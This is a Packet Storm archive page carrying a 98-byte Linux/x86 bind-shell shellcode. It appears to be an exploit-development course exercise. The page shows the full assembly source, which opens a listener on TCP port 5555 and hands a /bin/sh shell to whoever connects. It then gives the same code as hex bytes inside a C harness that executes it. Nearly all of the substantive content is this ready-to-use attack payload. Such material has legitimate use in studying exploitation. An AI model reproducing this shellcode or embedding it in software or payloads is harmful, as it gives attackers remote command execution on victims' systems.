what you don't know can hurt you

Linux/x86 TCP/5555 Bindshell Shellcode

Linux/x86 TCP/5555 Bindshell Shellcode
Posted May 28, 2018
Authored by Luca Di Domenico

98 bytes small Linux/x86 TCP/5555 bindshell shellcode.

tags | x86, tcp, shellcode
systems | linux
MD5 | 460b0890fcf26db29390427ea3c1ed44

Linux/x86 TCP/5555 Bindshell Shellcode

Change Mirror Download
#include<stdio.h>
#include<string.h>

/*

; Bind TCP Shellcode
; Copyright 2018, Luca Di Domenico
;
; This program is free software: you can redistribute it and/or modify
; it under the terms of the GNU General Public License as published by
; the Free Software Foundation, either version 3 of the License, or
; (at your option) any later version.
;
; This program is distributed in the hope that it will be useful,
; but WITHOUT ANY WARRANTY; without even the implied warranty of
; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
; GNU General Public License for more details.
;
; You should have received a copy of the GNU General Public License
; along with this program. If not, see <http://www.gnu.org/licenses/>.

; Title: Linux/x86 - TCP bind shell
; Author: Luca Di Domenico
; Website: https://thehackeradventure.com
; Blog post: https://thehackeradventure.com/2018/05/17/assignement1/
; Twitter: @sudo45
; SLAE-ID: 1245

global _start

section .text
_start:
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx

; socket()

push eax
mov al, 0x66
mov bl, 0x1
mov cl, 0x2
push ebx
push ecx
lea ecx, [esp]
int 0x80

; bind()

pop ecx
pop ebx
push word 0xb315
push word cx
mov ecx, esp
mov dl, 0x10
push edx
push ecx
push eax
xchg eax, edx
mov al, 0x66
mov bl, 0x2
mov ecx, esp
int 0x80

; listen()

push eax
push edx
mov al, 0x66
mov bl, 0x4
mov ecx, esp
mov edx, eax
int 0x80

; accept()

xchg eax, edx
pop edi
push edx
push edi
inc ebx
mov ecx, esp
int 0x80
xchg ebx, eax
xor ecx, ecx
mov cl, 0x2

_dup2_loop:

mov al, 0x3f
int 0x80
dec ecx
jns _dup2_loop

; execve()

xor ecx, ecx
push ecx ; 0x00
push 0x68732f2f ; hs//
push 0x6e69622f ; nib/
mov ebx, esp
mov al, 0xb
int 0x80

*/

unsigned char code[] = \
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\xb0\x66\xb3\x01\xb1\x02\x53\x51\x8d\x0c\x24\xcd\x80\x59\x5b\x66\x68\x15\xb3\x66\x51\x89\xe1\xb2\x10\x52\x51\x50\x92\xb0\x66\xb3\x02\x89\xe1\xcd\x80\x50\x52\xb0\x66\xb3\x04\x89\xe1\x89\xc2\xcd\x80\x92\x5f\x52\x57\x43\x89\xe1\xcd\x80\x93\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc9\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80";

main()
{

printf("Shellcode Length: %d\n", strlen(code));

int (*ret)() = (int(*)())code;

ret();

}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    1 Files
  • 2
    Feb 2nd
    2 Files
  • 3
    Feb 3rd
    17 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    16 Files
  • 7
    Feb 7th
    19 Files
  • 8
    Feb 8th
    1 Files
  • 9
    Feb 9th
    2 Files
  • 10
    Feb 10th
    15 Files
  • 11
    Feb 11th
    20 Files
  • 12
    Feb 12th
    12 Files
  • 13
    Feb 13th
    18 Files
  • 14
    Feb 14th
    17 Files
  • 15
    Feb 15th
    4 Files
  • 16
    Feb 16th
    4 Files
  • 17
    Feb 17th
    34 Files
  • 18
    Feb 18th
    15 Files
  • 19
    Feb 19th
    19 Files
  • 20
    Feb 20th
    20 Files
  • 21
    Feb 21st
    15 Files
  • 22
    Feb 22nd
    2 Files
  • 23
    Feb 23rd
    2 Files
  • 24
    Feb 24th
    16 Files
  • 25
    Feb 25th
    37 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close